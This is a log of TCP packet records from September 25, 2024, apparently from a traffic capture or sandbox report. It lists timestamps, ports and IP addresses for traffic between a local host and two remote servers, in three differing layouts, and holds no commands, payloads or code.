Sep 25, 2024 18:50:16.815582037 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.815629005 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.889158964 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.889180899 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.889339924 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.889359951 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.889398098 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.956871033 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.956967115 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.956988096 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.957006931 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.957047939 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:17.022979975 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:17.023005962 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:17.023060083 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:17.023088932 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:17.023103952 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:17.023123980 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:17.133044004 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:17.133074999 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:17.133214951 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:17.133244038 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:17.133285999 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:18.237483025 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:18.237493038 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:18.237529039 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:18.237577915 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:18.237596989 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:18.237632990 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:18.237663984 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:18.237850904 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:18.237869024 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:18.237936974 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:18.237943888 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:18.238040924 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
                                                Sep 25, 2024 18:50:18.498922110 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.498939037 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.498975992 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.499030113 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.499057055 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.499072075 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.499087095 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.499094963 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.499106884 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.499114990 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.499145031 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.499176025 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.499665022 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.499680042 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.499733925 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.499743938 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.499756098 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.499784946 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.499829054 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.500410080 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.500427008 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.500463009 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.500469923 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.500497103 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.500591993 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.500611067 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.500643015 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.500648975 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.500680923 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.501143932 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.501163006 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.501208067 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.501214981 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.501230001 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.501405954 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.501425028 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.501465082 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.501472950 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.501497030 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.501622915 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.501642942 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.501703978 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.501709938 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.502317905 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.502340078 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.502386093 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.502393007 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.502419949 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.502494097 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.502507925 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.502558947 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.502567053 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503056049 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503076077 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503135920 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.503144026 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503314018 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503328085 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503375053 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.503391981 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503408909 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.503599882 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503618002 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503648996 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.503654957 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503676891 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503695011 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.503724098 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.503729105 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503746986 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:18.503762007 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.503794909 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.507543087 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:18.628433943 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:18.633460999 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:18.633681059 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:18.633836031 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:18.638799906 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.113245964 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.113270998 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.113285065 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.113296986 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.113311052 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.113322020 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.113332987 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.113336086 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.113351107 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.113394976 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.113411903 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.113431931 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.115319014 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.115370989 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.118315935 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.118405104 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.118416071 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.118482113 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.201545954 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.201570988 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.201603889 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.201642036 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.201646090 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.201673985 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.201700926 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.201700926 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.201791048 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.202290058 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.202333927 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.202362061 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.202389956 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.202400923 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.202419043 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.202433109 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.205837965 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.205903053 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.206197977 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.206223965 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.206286907 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.206377983 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.206403971 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.206430912 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.206459999 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.206460953 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.206471920 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.206497908 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.206513882 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.206525087 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.206549883 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.206553936 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.206595898 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.206681013 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.207521915 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.207549095 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.207576036 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.207595110 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.207631111 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.290368080 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290415049 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290435076 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290446997 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290456057 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.290458918 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290484905 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.290644884 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290656090 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290668011 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290683985 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.290702105 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290709019 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.290714979 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290726900 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290743113 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290746927 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.290774107 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.290790081 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290801048 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290812969 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.290824890 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.291404963 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.291441917 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.291481972 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.291493893 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.291505098 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.291516066 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.291516066 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.291538000 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.291549921 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.291563988 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.291568995 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.291604996 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.292015076 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292026043 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292038918 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292057037 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.292082071 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.292104959 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292115927 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292128086 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292139053 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292140007 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.292165041 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.292200089 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292211056 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292234898 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292248964 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.292819977 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292830944 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292843103 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292855978 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.292879105 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.292896032 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292907000 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292920113 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.292931080 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.293036938 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.293046951 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.293057919 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.293071985 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.293081999 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.293083906 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.293117046 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.293772936 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.293782949 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.293795109 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.293808937 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.293945074 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.293956041 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.293981075 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.295284986 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.295325041 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.379121065 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379167080 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379179001 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379199028 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379210949 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379221916 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.379224062 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379240990 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.379261971 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.379430056 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379441977 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379452944 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379465103 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379471064 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.379478931 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379496098 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379508018 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379518032 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.379549980 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.379566908 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379579067 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379590034 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379601002 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379611969 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379617929 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.379625082 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379636049 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.379646063 CEST4970880192.168.2.5104.168.32.148
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Sep 25, 2024 18:50:19.379652023 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.379662991 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.379673958 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.379679918 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.379700899 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.379740000 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.379750013 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.379761934 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.379772902 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.379779100 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.379812002 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.379858971 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.379872084 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.379890919 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.379900932 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.379901886 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.379916906 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.379942894 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.379976988 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380132914 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380145073 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380157948 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380193949 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380249977 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380259991 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380270004 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380283117 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380289078 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380306005 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380388021 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380404949 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380415916 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380422115 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380429029 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380439043 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380441904 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380454063 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380465031 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380470991 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380476952 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380487919 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380494118 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380516052 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380657911 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380728960 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380760908 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380780935 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380791903 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380804062 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380839109 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380870104 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380881071 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380892038 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380908012 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380930901 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.380943060 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380953074 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380964041 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380978107 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.380995035 CEST  49708        80         192.168.2.5     104.168.32.148
